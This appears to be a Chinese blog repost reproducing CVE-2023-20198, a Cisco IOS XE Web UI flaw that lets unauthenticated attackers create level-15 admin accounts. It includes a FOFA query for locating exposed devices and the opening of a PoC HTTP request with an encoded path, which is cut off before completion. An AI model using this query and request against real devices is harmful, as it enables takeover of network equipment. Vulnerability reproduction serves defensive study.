当前位置:首页 » 《关注互联网》 » 正文

Cisco IOS XE Web UI 权限提升漏洞复现(CVE-2023-20198)

24 人参与  2024年05月25日 11:08  分类 : 《关注互联网》  评论

点击全文阅读


0x01 产品简介

Web UI 是一种基于GUI的嵌入式系统管理工具,能够提供系统配置、简化系统部署和可管理性以及增强用户体验。它带有默认映像,因此无需在系统上启用任何内容或安装任何许可证。Web UI 可用于构建配置以及监控系统和排除系统故障,而无需CLI专业知识。

0x02 漏洞概述

当Cisco IOS XE 软件的web UI暴露于互联网或不受信任的网络时,未经身份验证的远程攻击者可以利用该漏洞在受影响的系统上创建具有15级访问权限的帐户。攻击者可以利用该帐户来控制受影响的系统。

利用条件需要启用HTTP Server或者HTTPS Server。

0x03 影响范围

启用了Web UI 功能的Cisco IOS XE

0x04 复现环境

FOFA:

body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>"

0x05 漏洞复现

PoC

POST /%2577eb%2575i_%2577sma_Http HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Content-Type: application/x-www-form-urlencod

点击全文阅读


本文链接:http://zhangshiyu.com/post/113277.html

<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

关于我们 | 我要投稿 | 免责申明

Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1